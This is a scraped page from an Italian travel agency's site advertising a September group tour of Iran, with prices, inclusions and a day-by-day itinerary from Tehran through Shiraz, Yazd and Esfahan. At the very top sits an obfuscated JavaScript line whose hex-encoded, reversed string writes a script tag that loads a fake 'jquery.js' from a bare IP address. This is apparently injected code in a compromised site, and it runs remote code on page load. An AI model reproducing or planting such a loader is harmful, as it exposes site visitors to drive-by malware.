var _0x2515=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0x2515[5]](_0x2515[4][_0x2515[3]](_0x2515[0])[_0x2515[2]]()[_0x2515[1]](_0x2515[0])); 4Winds | Gruppo speciale Iran settembre - 4Winds

Gruppo speciale Iran settembre

Mar 8, 16 • Offerte viaggiNo CommentsRead More »

IRAN: GRUPPO SPECIALE IN PERSIA (13-22 IRAN SETTEMBRE) da Eur 2150
Tour di gruppo in Iran con guida in italiano e volo da Roma incluso; buon livello alberghiero e pensione completa

Iran SettembrePERSIA, PARTENZA SPECIALE (13-22 Iran Settembre)
da AHWAZ A ESFAHAN segue uno degli itinerari più interessanti della intera Persia.
Al tema della antica Persia si sovrappone una ricchezza estetica islamica di grandi dimensioni e raffinatezze. Moschee, madrasse, giardini, palazzi e tombe degli eroi nazionali che sono i poeti. Vi sorprenderà un popolo ospitale e amichevole quanto radicato nella propria storia e tradizione.
Tour di gruppo Iran Settembre con volo da Roma (o altri scali su richiesta), pensione completa e un fitto programma di escursioni con guida in italiano.
Livello alberghiero medio. Itinerario storico archeologico di alto profilo culturale.

Scarica il pdf da affissione Iran Settembre

La quota include: Volo da Roma, pensione completa, ingressi, guida in italiano, trasferimenti.

Possibilità di decollo da diversi scali italiani, solo su richiesta.


 

 

PERSIA, partenza speciale (13-22 Iran settembre)
da Eur 2150 + tasse 

APPROFONDISCI

In breve: Circuito di gruppo in Persie: l’ Iran settembre include volo da Roma (o altri scali su richiesta), pensione completa e guida in italiano. Un paese fantastico con una storia antichissima e dalle tradizioni radicate, crocevia di civiltà e di religioni, dagli incantevoli paesaggi naturali e dal patrimonio artistico e culturale immenso.

13SET: ITALIA in aereo TEHRAN
Partenza da Roma (o altro scalo, su richiesta) per l’Iran. Arrivo all’aeroporto Iman Khomeini, disbrigo delle formalità di ingresso, incontro con la guida e trasferimento in albergo.
Resto della giornata a disposizione.

14SET: TEHRAN in aereo SHIRAZ
Nella mattinata visita alla città di Tehran (altitudine 1150m.), l’attuale capitale politica-amministrativa. La città ha una storia recente, solo nel XVIII secolo diviene capitale: è una metropoli caotica e moderna (15 milioni di abitanti), gli interventi urbanistici maestosi (piazza della Rivoluzione) le larghe strade di comunicazione sono l’emblema di una megalopoli in continua crescita.
Il Museo Archeologico, ricco di reperti che tracciano la storia del paese, straordinaria la collezione di manufatti fittili; museo di gioielli (aperto da sabato a martedì , altrimenti il museo dei Vetri e delle Ceramiche). Nel pomeriggio trasferimento in aeroporto e partenza per Shiraz (durata volo un’ora). Arrivo, trasferimento in albergo, cena e pernottamento.

15SET: SHIRAZ – PERSEPOLI – SHIRAZ
Prima colazione – in mattinata l’escursione a Persepoli (altitudine 1700 metri) visita approfondita del Palazzo Primavera fatto costruire da Dario I nel 518 a.C per celebrare le feste d’ inizio anno. L’enorme piattaforma e’ ricoperta di bassorilievi raffiguranti tutte le popolazioni che facevano parte dell’ Impero Persiano. Prima Dario e poi Serse avevano fatto affluire in Persia i migliori artigiani del loro mondo, per costruire un palazzo che doveva essere la summa dell’ architettura e della scultura delle regioni Mesopotamiche. La visita prosegue con Naqsh-e Rostam – luogo delle tombe dei primi Imperatori: Dario il Grande, Serse, Artaserse I e Dario II. Sosta per il pranzo.
Proseguimento con la visita della città nota per i suoi giardini e per la mitezza del suo clima. Si visiteranno la tomba del poeta Hafez e il complesso di Vakil: la Moschea del Vakil, il bellissimo Bazar Vakil e il Caravanserraglio di Moshir. Rientro in albergo cena e pernottamento.

16SET: SHIRAZ – PASARGAD – YAZD
Prima colazione e partenza per Yazd (altitudine 1200 metri) e durante il percorso sosta per visitare Pasargade, prima capitale Achemenide con la tomba del suo leggendario fondatore Ciro il Grande. Nel pomeriggio arrivo a Yazd, citta’ dal colore dell’argilla che sorge ai margini di due deserti il Dasht-e-Kavir e il Kavir-e-Lut ed é famosa per le sue Badghir: le caratteristche Torri di Ventilazione sui tetti delle case. Nel tardo pomeriggio arrivo in città, cena e pernottamento (max altitudine del percorso, in un piccolo tratto, 2200 metri).

17SET: YAZD
Prima colazione e visita alla città di Yazd. Si visitano: il Tempio del Fuoco, dove ancora oggi gli zoroastriani celebrano i loro riti religiosi; la moschea Jame e la bella piazza di Miciakhnaq con la cisterna di acqua e la moschea, il bazar, l’antico quartiere di Fahadan protetto dall’Unesco. Passeggiate nel quartiere antico di Fahadan protetto dall Unesco, le Torri del Silenzio di Dakhmeh e l’antico cimitero degli zoroastriani concludono la visita. Rientro in albergo cena e pernottamento.

18SET: YAZD – MEIBOD – NAIN – ESFAHAN
Prima colazione e partenza per Esfahan. Lungo il percorso visita a Meibod con la sua cittadella di 3000 mila anni fa, molto simile a Bam e di seguito alll’antica Nain. Visita alla moschea Masjed-e Jamé e al quartiere antico. Pranzo e proseguimento per Esfahan (altitudine 1590 metri) la Citta’ della “Mille e una notte”. Arrivo in albergo cena e pernottamento (max altitudine nel percorso, in un piccolo tratto, 2300 metri).

19SET: ESFAHAN
Visita della città tra le più suggestive del mondo. Un vecchio detto persiano dice: “Se vuoi vedere il mondo: basta Venezia e Isfahan”. Per secoli la città è stata crocevia di commerci. Mercanti e artigiani illuminati hanno dato impulso, nei secoli, alla costruzione di una città piena di cultura ed elegante, che lascia senza fiato per la bellezza dei suoi innumerevoli monumenti.
Il periodo di maggior splendore, nella sua antichissima storia, è stato, senza dubbio, il regno di Abbas I (1587-1629), sovrano Safavide che fece costruire moschee, palazzi e dimore di pregevole fattura, trasformando Esfahan in un centro artistico e culturale di grande importanza. Nel pomeriggio visita della stupenda piazza, della Moschea dell’Imam e al fornitissimo Bazar. Cena in un ristorante tradizionale. Pernottamento.

20SET: ESFAHAN
Al mattino proseguimento e completamento della visita: la Grande Moschea del Venerdi o Jame, il padiglione e parco di Chehel Sotun costruito da Abbas I, la chiesa armena di Vank con l’annesso museo, il ponte Khaju, bellissimo ponte a 33 archi del 1600. Cena e pernottamento.

21SET: ESFAHAN – KASHAN -TEHRAN
In mattinata partenza per Tehran via Kashan, la città che viene considerata la culla della civiltà. L’origine risale al VI millennio a.C., rasa al suolo due volte dagli invasori e sempre ricostruita dagli indomiti abitanti, fino a raggiungere il suo massimo splendore nel 1051-1220. Famosa per i tessuti le ceramiche e le piastrelle. Nella città si visitano il girdino di Fin, la casa bioclimática Brujerdi di epoca Cagiari e la collina di Sialk. In serata arrivo a Tehran, cena e pernottamento.

22SET: TEHRAN in aereo ITALIA
Alla mattina presto trasferimento in aeroporto partenza con il volo di linea da Tehran per l’Italia.

APPROFONDISCI

Tags: , , , , , , ,

Rispondi

%d blogger hanno fatto clic su Mi Piace per questo: